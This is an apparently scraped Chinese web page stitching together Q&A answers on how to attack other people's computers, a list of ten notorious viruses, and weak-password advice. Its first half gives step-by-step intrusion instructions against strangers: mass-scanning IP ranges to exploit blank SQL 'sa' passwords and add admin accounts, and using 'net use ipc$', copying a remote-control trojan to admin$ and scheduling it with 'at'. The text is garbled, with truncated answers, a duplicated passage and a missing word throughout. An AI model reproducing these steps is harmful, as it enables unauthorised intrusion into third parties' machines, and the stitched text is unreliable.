1.怎么攻击电脑?

2.全球最可怕10大电脑

3.弱口令的注意事项

4.弱口令是什么意思?

怎么攻击电脑?

电脑系统弱口令检查-windows弱口令扫描工具

问题一:如何攻击别人的电脑 教你如何远程攻击别人的电脑(黑客教程)

1,傻瓜级入侵

之所以说这是傻瓜级,因为这个方法完全不用动脑子,并且保守的说,照这个方法,两个小时内肯定至少能入侵3台电脑!3台绝对是保守的数目!

需要软件:WinntAutoAttack (版本:V2.0) Remote Administrator v2.0(简称RA) 3389登陆器(xp自带的有,要是xp,就不要下载了,就是开始-所有程序-附件-通讯-远程桌面连接

不知道在哪下?用百度搜!我最不喜欢的就是当在群里我告诉别人用什么软件后,他还喋喋不休的问我在哪下?把地址给我吧,太懒了吧,难道下载地址在我脑子里?我不也是要搜吗?

好了,下边我们开始入侵了,下边就是过程:

第一步. 打开WinntAutoAttack,就是那个手雷的标志,在起始ip里和目标ip里填上一个ip段,并且尽量把范围搞大点,比如在起始ip里填218.88.1.1,在目标ip里填218.88.255.255.ip段建议下一个显ip的qq,参考你qq上好友的ip去填.中奖概率更大!勾上仅对ping检查成功的机器进行检测,检测3389端口和收集netbios信息

在IIS溢出选项卡里勾上开99端口shell,这个是用来开99端口telnet的,要是你不会用telnet,这个就不要勾了. 在简单管理员密码选项卡里勾上列出所有密码简单的管理帐号和上传并安装远程图形控制软件. 在sql漏洞选项卡里也一样,就是把三个框都打上勾,就是列出密码为空的sa帐号建立系统管理员帐号(shanlu)和上传并安装远程图形控制软件.

好了,连上网(你不会连网都没连吧?)根据你机器的性能,把线程调下,就是拖那个小滑块,越往右线程越大,要是你的机器性能不好,太大的线程会死机的!我的机器性能不错,我才用110左右的线程,并且有的时候我也会死机... ...(哭... ...)

ok!一切就绪!点开始 . 接下来,接下来我们干什么呢?在qq上聊天吧,等结果吧

第二步. 时间很快就过去了,过了半个小时了吧,我们看看有没有什么结果,点信息,把上边的废话框内容往下拉

主机:218.88.55.55

3389,Windows 2000 Advance Server Terminal 端口开放。

SQL漏洞:

sa帐号密码为空。

建立系统管理员帐号shanlu()成功

哈哈,有肉鸡了,这个是3389的肉鸡,我们用3389的登陆器登陆上去,填上他的ip,用户名是shanlu,密码是空,他的机器就展现在我们面前了!

要是有这样的提示:

主机:218.88.55.55

3389,Windows 2000 Advance Server Terminal 端口开放。

简......>>

问题二:知道对方的IP,如何攻击对方的电脑? 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明4.在Windows目录下有一文件供为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名5.开DOS窗口键入 NBTSTAT -R6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。

问题三:怎么攻击别人的电脑 攻击别人电脑不是那么好弄的 而且不知道你的意思是攻击别人的电脑 还是要入侵别人的电脑?如果攻击别人的电脑 那么首先你是需要有大量的肉鸡 一台电脑相当于一台肉鸡 用远控来上线 之后查到对方的IP地址 看看是否能PING通 然后用大量肉鸡里的流量去攻击对方电脑 轻者可使对方电脑网速变慢、死机,重者完全可以损坏对方的电脑。不过要有大量肉鸡是很不容易的 需要有一个免杀的木马才可以。如果要是入侵对方的电脑 这个更麻烦 查到对方IP 然后还需要扫描对方电脑的弱口令 进行猜解等等 一般对方电脑如果开启1433、3389、135等这些高危端口 也是比较容易入侵的 不过我说的这两种是很麻烦的 还是建议你不要考虑这些了

问题四:怎么用CMD攻击个人电脑? 64132是端口号

搞小破坏方法不建议使用,如果想开个玩笑,去下载个扫描工具,针对IP看有什么漏洞,然后根据具体漏洞实施入侵(具体就不详细说了,免得带坏你呵呵)取得ADMIN帐户就可以为所欲为了

问题五:怎么攻击别人电脑 这又何苦这样

提起黑客,总是那么神秘莫测。在人们眼中,黑客是一群聪明绝顶,精力旺盛的年轻人,一门心思地破译各种密码,以便偷偷地、未经允许地打入 *** 、企业或他人的计算机系统,窥视他人的隐私。那么,什么是黑客呢?

黑客(hacker),源于英语动词hack,意为“劈,砍”,引申为“干了一件非常漂亮的工作”。在早期麻省理工学院的校园俚语中,“黑客”则有“恶作剧”之意,尤指手法巧妙、技术高明的恶作剧。在日本《新黑客词典》中,对黑客的定义是“喜欢探索软件程序奥秘,并从中增长了其个人才干的人。他们不象绝大多数电脑使用者那样,只规规矩矩地了解别人指定了解的狭小部分知识。”由这些定义中,我们还看不出太贬义的意味。他们通常具有硬件和软件的高级知识,并有能力通过创新的方法剖析系统。“黑客”能使更多的网络趋于完善和安全,他们以保护网络为目的,而以不正当侵入为手段找出网络漏洞。

另一种入侵者是那些利用网络漏洞破坏网络的人。他们往往做一些重复的工作(如用暴力法破解口令),他们也具备广泛的电脑知识,但与黑客不同的是他们以破坏为目的。这些群体成为“骇客”。当然还有一种人兼于黑客与入侵者之间。

一般认为,黑客起源于50年代麻省理工学院的实验室中,他们精力充沛,热衷于解决难题。60、70年代,“黑客”一词极富褒义,用于指代那些独立思考、奉公守法的计算机迷,他们智力超群,对电脑全身心投入,从事黑客活动意味着对计算机的最大潜力进行智力上的自由探索,为电脑技术的发展做出了巨大贡献。正是这些黑客,倡导了一场个人计算机革命,倡导了现行的计算机开放式体系结构,打破了以往计算机技术只掌握在少数人手里的局面,开了个人计算机的先河,提出了“计算机为人民所用”的观点,他们是电脑发展史上的英雄。现在黑客使用的侵入计算机系统的基本技巧,例如破解口令(password cracking),开天窗(trapdoor),走后门(backdoor),安放特洛伊木马(Trojan horse)等,都是在这一时期发明的。从事黑客活动的经历,成为后来许多计算机业巨子简历上不可或缺的一部分。例如,苹果公司创始人之一乔布斯就是一个典型的例子。

在60年代,计算机的使用还远未普及,还没有多少存储重要信息的数据库,也谈不上黑客对数据的非法拷贝等问题。到了80、90年代,计算机越来越重要,大型数据库也越来越多,同时,信息越来越集中在少数人的手里。这样一场新时期的“圈地运动”引起了黑客们的极大反感。黑客认为,信息应共享而不应被少数人所垄断,于是将注意力转移到涉及各种机密的信息数据库上。而这时,电脑化空间已私有化,成为个人拥有的财产,社会不能再对黑客行为放任不管,而必须取行动,利用法律等手段来进行控制。黑客活动受到了空前的打击。

但是, *** 和公司的管理者现在越来越多地要求黑客传授给他们有关电脑安全的知识。许多公司和 *** 机构已经邀请黑客为他们检验系统的安全性,甚至还请他们设计新的保安规程。在两名黑客连续发现网景公司设计的购物程序的缺陷并向商界发出公告之后,网景修正了缺陷并宣布举办名为“网景缺陷大奖赛”的竞赛,那些发现和找到该公司产品中安全漏洞的黑客可获1000美元奖金。无疑黑客正在对电脑防护技术的发展作出贡献。

2,黑客攻击

一些黑客往往回取一些几种方法,但是我很想说的是,一个优秀的黑客绝不会随便攻击别人的。

1)、获取口令

这又有三种方法:一是通过网络监听非法得到用户口令,这类方法有一定的局限性,但危害性极大,监听者往往能够获得其所在网段的所有用户......>>

问题六:如何在自己电脑上攻击他人电脑? 其实攻击别人的电脑不是最让人头痛的办法,要是共同的网线,就下载一个P2P终结者软件,控制他的流量,急死他! 下面是如何攻击别人电脑,给你一个网址,你自己可以去学一学,上面有很多方法的hi.baidu/...a (一):shed.exe

(二)流光2000

(三)cmd.exe (其实就是2000下的dos啦)!

(四)冰河8.4 操作系统:win2000 server 或者winxp系统。 “shed.exe”:其实就是用来网上查共享的,速度快,可以查到很多服务断的共项文件,不过在这里面有些ip在浏览器中无法访问,这是因为其中也包含了个人上网的ip.呵呵!一些作网站,网吧的服务器一些目录都是共享的,有些是可以访问,但是不能删除,因为你所访问的都是以匿名访问的,所以权限不够!有些需要密码。遇到密码怎办?用流光! “流光”虽说对202作了限制,但是对小日本的ip可是没有限制的,呵呵!所以说使用流光的ipc探测,建立一个空对话,查到用户列表,然后先简单探测,此时有些网管懒惰,把administrator设置的过于简单,呵呵,你就可以抓到了。

下一步如何做呢?也许在你查对方的端口时发现对方开的端口很少,比如ftp没开,怎办呢?冰河! “冰河”,想必许多朋友都玩过,使用冰河控制一台服务器速度很快,(因为服务器那边带宽很大)几分钟就可以查到对方主机的主页所在位置。但是如何上传并且控制他呢? “cmd.exe” 是2000下的dos了,执行cmd.exe 使用net命令,

具体操作如下:

第一步:net use \\ip\ipc$ “password” /user:”user” 说明:以一个超级用户名与你想黑的网站建立联接,当然超级用户必须是该网站admin里的。这里的”ip”就是主机了,“password”就是超级用户的密码,“user”就是超级用户。比如:net use \\210.248.250.2\ipc$ “maozhiie” /user:maozhijie

第二步:copy g-server.exe \\ip\admin$\system32 说明:g-server.exe就是冰河的远程服务器端。意义:将此文件拷贝到对方的主机winnt里的system32目录里。也许有人要问木马侵入对方那边可以察觉出来的吧,呵呵!装了防火墙估计可以,不过很多主机没钱买呀!不像中国盗版满天飞!如果你有最新的木马也可以的!这是最好的了!!嘿嘿……

第三步:net time \\ip 察看对方的服务器时间。由于有时差,应该是一个小时吧!所以必须要以对方的服务器时间为准。

第四步:at \\ip time g-server.exe 这里的time就是对方的主机时间。作用:在规定时间执行该程序。比如 at \\210.248.250.2 19:55 g-server.exe 第五步:冰河就可以控制该电脑了。这个我就不说了吧,呵呵!菜鸟也会......>>

问题七:怎样攻击别人的电脑、或者是系统。 知道对方的IP,然后用攻击软件进行攻击,具体的方法就不是一二天能学会的了,也不是一句话两句话能说清楚的,就这样一个单纯的攻击就可以写一本书。

问题八:知道对方电脑的IP地址,怎么对其进行攻击他的电脑 知道对方IP入侵别人的电脑

黑客已经成为一种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿别人开玩笑,搞些恶作剧。其实黑客的最高境界在于防守,不在于进攻。所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比对方更多的系统知识,了解更多的系统漏洞,及如何弥补漏洞。现在满天都是黑客教程,但真正有用的不多,下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。注释掉的------>

黑客已经成为一种文化,很多人想成为黑客,他们偶尔学到了几种小花招,总喜欢拿别人开玩笑,搞些恶作剧。其实黑客的最高境界在于防守,不在于进攻。所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比对方更多的系统知识,了解更多的系统漏洞,及如何弥补漏洞。现在满天都是黑客教程,但真正有用的不多,下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入。以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址

hackant/?u=11714

问题九:黑客是如何攻击别人的电脑的? 黑客常常利用电子邮件系统的漏洞,结合简单的工具就能达到攻击目的。一同走进黑客的全程攻击,了解电子邮件正在面临的威胁和挑战……毫无疑问,电子邮件是当今世界上使用最频繁的商务通信工具,据可靠统计显示,目前全球每天的电子邮件发送量已超过500亿条,预计到2008年该数字将增长一倍。电子邮件的持续升温使之成为那些企图进行破坏的人所日益关注的目标。如今,黑客和撰写者不断开发新的和有创造性的方法,以期战胜安全系统中的改进措施。出自邮件系统的漏洞典型的互联网通信协议――TCP和UDP,其开放性常常引来黑客的攻击。而IP地址的脆弱性,也给黑客的伪造提供了可能,从而泄露远程服务器的信息。防火墙只控制基于网络的连接,通常不对通过标准电子邮件端口(25端口)的通信进行详细审查。一旦企业选择了某一邮件服务器,它基本上就会一直使用该品牌,因为主要的服务器平台之间不具互操作性。以下分别概述了黑客圈中一些广为人知的漏洞,并阐释了黑客利用这些安全漏洞的方式。一、IMAP 和 POP 漏洞密码脆弱是这些协议的常见弱点。各种IMAP和POP服务还容易受到如缓冲区溢出等类型的攻击。二、拒绝服务(DoS)攻击1.死亡之Ping――发送一个无效数据片段,该片段始于包结尾之前,但止于包结尾之后。2.同步攻击――极快地发送TCP SYN包(它会启动连接),使受攻击的机器耗尽系统,进而中断合法连接。3.循环――发送一个带有完全相同的源/目的地址/端口的伪造SYN包,使系统陷入一个试图完成TCP连接的无限循环中。三、系统配置漏洞企业系统配置中的漏洞可以分为以下几类:1.默认配置――大多数系统在交付给客户时都设置了易于使用的默认配置,被黑客盗用变得轻松。2.空的/默认根密码――许多机器都配置了空的或默认的根/管理员密码,并且其数量多得惊人。3.漏洞创建――几乎所有程序都可以配置为在不安全模式下运行,这会在系统上留下不必要的漏洞。面说说吧,希望你能从中领略一些道理.

问题十:电脑被攻击了,怎么办 安装杀毒软件和防火墙,拒绝攻击即可。

DoS是Denial of Service的简称,即拒绝服务,造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务。最常见的DoS攻击有计算机网络带宽攻击和连骇性攻击。带宽攻击指以极大的通信量冲击网络,使得所有可用网络都被消耗殆尽,最后导致合法的用户请求就无法通过。连通性攻击指用大量的连接请求冲击计算机,使得所有可用的操作系统都被消耗殆尽,最终计算机无法再处理合法用户的请求。

全球最可怕10大电脑

 还有什么比发现电脑中毒更郁闷的呢?下面由我给你做出详细的史上最可怕的十大介绍!希望对你有帮助!

 全球最可怕10大电脑:

 对于很多人来说,电脑中毒就是一场噩梦。硬盘数据被清空,网络连接被掐断,好好的机器变成了毒源,开始传染其他电脑。当然,如果你的电脑没有中过毒,也许会认为这不值得大惊小怪。但您可千万不要掉以轻心,有 报告 显示,仅2008年,电脑在全球造成的经济损失就已高达85亿美元之多。电脑可以说是网络世界最严重的的危害。

 以色列魏茨曼科学研究所的负责人AdiShamir,

 同时负责领导反间谍软件联合会  电脑已经出现很多年了。1949年,科学家约翰?冯?诺依曼声称,可以自我复制的程序并非天方夜谭。那时计算机科学刚刚起步,可是已经有人想出破坏电脑系统的基本原理。不过直到几十年后,黑客们才开始真正编制。

 虽然早有人在大型电脑上制造出类似的程序,但直到个人电脑开始普及,计算机才引起人们的注意。1个名为弗雷德?科恩(FredCohen)的博士生首先把这种修改电脑设置并能自我复制的程序称为,这个称呼一直沿用到今天。

 在20世纪80年代,需要依靠人类的帮助才能传播到其他机器。黑客们需要把储存在磁盘上,然后借给其他人,当时的危害并不是很大。直到网络逐渐普及,人们才开始正视计算机的威胁。今天我们谈到的电脑,通常指那些通过网络进行自我传播的,它们一般通过电子邮件或者有害链接进行扩散,传播速度远远超过了早期的电脑。

 下面,就让我带你回顾史上最厉害的10种。

 Symbian骷髅感染手机,导致手机出现一堆骷髅

 1、CIH(1998年 )是一位名叫陈盈豪的台湾大学生所编写的,从传入大陆地区的。CIH的载体是1个名为?ICQ中文Ch_at模块?的工具,并以热门盗版光盘游戏如?古墓奇兵?或Windows95/98为媒介,经互联网各网站互相转载,使其迅速传播。

 CIH属文件型,其别名有Win95.CIH、Spacefiller、Win32.CIH、PE_CIH,它主要感染Windows95/98下的可执行文件(PE格式,PortableExecutable Format),目前的版本不感染DOS以及WIN 3.X(NE格式,Windows and OS/2Windows 3.1 execution File Format)下的可执行文件,并且在WinNT中无效。其发展过程经历了v1.0,v1.1、v1.2、v1.3、v1.4总共五个版本。损失估计:全球约5亿美元

 卡内基?麦隆大学的计算机紧急情况处理中心,

?

 提醒公众注意红色代码的危险性

 2、梅利莎(1999年) 是通过微软的Outlook电子邮件软件,向用户通讯簿名单中的50位联系人发送邮件来传播自身。该邮件包含以下这句话:?这就是你请求的文档,不要给别人看?,此外夹带1个Word文档附件。而单击这个文件,就会使感染主机并且重复自我复制。

 梅丽莎的制造者,大卫?L?史密斯在法庭受审时的照片

 1999年3月26日,周五,WM/梅利莎登上了全球各地报纸的头版。估计数字显示,这个Word宏脚本感染了全球15%~20%的商用PC。传播速度之快令英特尔公司(Intel)、微软公司(Microsoft,下称微软)、以及其他许多使用Outlook软件的公司措手不及,防止损害,他们被迫关闭整个电子邮件系统。损失估计:全球约3亿?6亿美元。

 3、爱虫(2000年) 是通过Outlook电子邮件系统传播,邮件主题为?I LoveYou?,包含附件?Love-Letter-for-you.txt.vbs?。打开附件后,该会自动向通讯簿中的所有电子邮件地址发送邮件副本,阻塞邮件服务器,同时还感染扩展名为.VBS、.HTA、.JPG、.MP3等12种数据文件。

 爱虫电脑截图。

 新?爱虫?(Vbs.Newlove)同爱虫(Vbs.loveletter)一样,通过outlook传播,打开邮件附件您会观察到计算机的硬盘灯狂闪,系统速度显著变慢,计算机中出现大量的扩展名为vbs的文件。所有快捷方式被改变为与系统目录下wscript.exe建立关联,进1步消耗系统,造成系统崩溃。损失估计:全球超过100亿美元。

 4、红色代码(2001年) 是1种计算机蠕虫,能够通过网络服务器和互联网进行传播。2001年7月13日,红色代码从网络服务器上传播开来。它是专门针对运行微软互联网信息服务软件的网络服务器来进行攻击。极具讽刺意味的是,在此之前的六月中旬,微软曾经发布了1个补丁,来修补这个漏洞。

 被它感染后,遭受攻击的主机所控制的网络站点上会显示这样的信息:?你好!欢迎光临.worm!?。随后便会主动寻找其他易受攻击的主机进行感染。这个行为持续大约20天,之后它便对某些特定IP地址发起拒绝服务(DoS)攻击。不到一星期感染了近40万台服务器,100万台计算机受到感染。损失估计:全球约26亿美元。

 诺维格促使美国议员查克?舒默成立了国家应急中心

 5、冲击波(2003年) 于2003年8月12日被瑞星全球反监测网率先截获。运行时会不停地利用IP扫描技术寻找网络上系统为Win2K或XP的计算机,找到后利用DCOMRPC缓冲区漏洞攻击该系统,一旦成功,体将会被传送到对方计算机中进行感染,使系统操作异常、不停重启、甚至导致系统崩溃。

 另外该还会对微软的1个升级网站进行拒绝服务攻击,导致该网站堵塞,使用户无法通过该网站升级系统。在8月16日以后,该还会使被攻击的系统丧失更新该漏洞补丁的能力。损失估计:数百亿美元。

 Slammer对韩国影响很大,使很多网吧和提供上网服务的咖啡店人流骤减

 6、巨无霸(2003年) 是通过局域网传播,查找局域网上的所有计算机,并试图将自身写入网上各计算机的启动目录中以进行自启动。该一旦运行,在计算机联网的状态下,就会自动每隔两小时到某一指定网址下载,同时它会查找电脑硬盘上所有邮件地址,向这些地址发送标题如:"Re:Movies"、"Re:Sample"等字样的邮件进行邮件传播,该还会每隔两小时到指定网址下载,并将用户的隐私发到指定的邮箱。

 由于邮件内容的一部分是来自于被感染电脑中的资料,因此有可能泄漏用户的机密文件,特别是对利用局域网办公的企事业单位,最好使用网络版杀毒软件以防止重要资料被窃取!损失估计:50亿?100亿美元。

 我们应该感谢阿尔?扬科维奇提醒了我们?臭奶酪?的危害 

7、MyDoom(2004年) 是一例比?巨无霸?更厉害的体,在2004年1月26日爆发,在高峰时期,导致网络加载时间减慢50%以上。它会自动生成文件,修改注册表,通过电子邮件进行传播,并且它还会尝试从多个URL下载并执行1个后门程序,如下载成功会将其保存在Windows文件夹中,名称为win32.exe。该后门程序允许恶意用户远程访问被感染的计算机。

 使用自身的SMTP引擎向外发送带毒电子邮件,进行传播。会从注册表的相关键值下和多种扩展名的文件中搜 集邮 件地址,还会按照一些制定的规则自己声称邮件地址,并向这些地址发送带毒电子邮件。同时会略去还有特定字符的邮件地址。损失估计:百亿美元。

 8、震荡波(2004年) 于2004年4月30日爆发,短短的时间内就给全球造成了数千万美元的损失,也让所有人记住了04年的4月,该为I-Worm/Sasser.a的第三方改造版本。与该以前的版本相同,也是通过微软的最新LSASS漏洞进行传播,我们及时提醒广大用户及时下载微软的补丁程序来预防该的侵害。如果在纯DOS环境下执行文件,会显示出谴责美国大兵的英文语句。

 SvenJaschan,震荡波和网络天空的制造者,从法庭离开。

 震荡波感染的系统包括Windows 2000、Windows Server 2003和WindowsXP,运行后会巧妙的将自身复制为%WinDir%\napatch.exe,随机在网络上搜索机器,向远程计算机的445端口发送包含后门程序的非法数据,远程计算机如果存在MS04-011漏洞,将会自动运行后门程序,打开后门端口9996。损失估计:5亿至10亿美元

 9、熊猫烧香(2006年) 准确的说是在06年年底开始大规模爆发,以Worm.WhBoy.h为例,由Delphi工具编写,能够终止大量的反软件和防火墙软件进程,会删除扩展名为gho的文件,使用户无法使用ghost软件恢复 操作系统 。?熊猫烧香?感染系统的*.exe、*、*.pif、*.src、*.html、*.asp文件,导致用户一打开这些网页文件,IE自动连接到指定网址中下载。在硬盘各分区下生成文件autorun.inf和setup.exe.还可通过U盘和移动硬盘等进行传播,并且利用Windows系统的自动播放功能来运行。

 ?熊猫烧香?还可以修改注册表启动项,被感染的文件图标变成?熊猫烧香?的图案。还可以通过共享文件夹、系统弱口令等多种方式进行传播。损失估计:上亿美元。

 万幸的是,市场上从来不缺杀毒软件

10、网游大盗(2007年) 是一例专门**网络游戏帐号和密码的,其变种wm是典型品种。英文名为Trojan/PSW.GamePass.jws的?网游大盗?变种jws是?网游大盗?木马家族最新变种之一,用VisualC++编写,并经过加壳处理。?网游大盗?变种jws运行后,会将自我复制到Windows目录下,自我注册为?Windows_Down?系统服务,实现开机自启。

弱口令的注意事项

1.在笔记本或其它地方不要记录口令。

2.向他人透露口令,包括管理员和维护人员。当有人打电话来向你索要口令时,你就该保持警惕了。

3.在e-mail或即时通讯工具中不透露口令。

4.离开电脑前,启动有口令保护的屏幕保护程序。

5.在多个帐户之间使用不相同的口令。

6.在公共电脑不要选择程序中可保存口令的功能选项。

切记,不要使用弱口令,以及保护好你的口令。

同时要注意,改过的口令一定要牢记。很多人因常改口令而遗忘,造成很多不必要的麻烦。

弱口令是什么意思?

弱口令我们可以简单的理解为能让别人随意就猜到的密码,比如abc、111、123、123456、88888888等等诸如此类的密码。

除此之外大家都能知道的密码称之为弱口令。还有以下的几点也如果不达到要求也可以称之为弱口令:

①空口令,没有设置密码

②口令小于8个字符且较为简单

③口令为连续的字母或者单纯数字

④口令为本人相关的名字字母,生日,易被发现的邮箱号,账号名昵称名,都可以称为弱口令,可以定义为针对你的弱口令,而不是普遍的弱口令。

弱口令一旦被破解将面临很严重的资产风险,在网络安全方面,我们的云主机,服务器一旦暴露了我们的登录密码则会导致我们的主机被入侵,导致我们网站,,主机载体的内容受到损坏,可能导致不可逆的破坏和严重的经济损失。

同时不仅仅是主机、服务器,弱口令还涉及到我们日常的各类登录密码邮箱,微信、qq、web注册页面等等都是我们需要留意的,账号价值高的账户一定要设置安全复杂口令。

复杂口令建议:8字符以上且包含英文大小写+数字+符号的组合,同时一旦有暴露口令的风险一定要及时更换口令。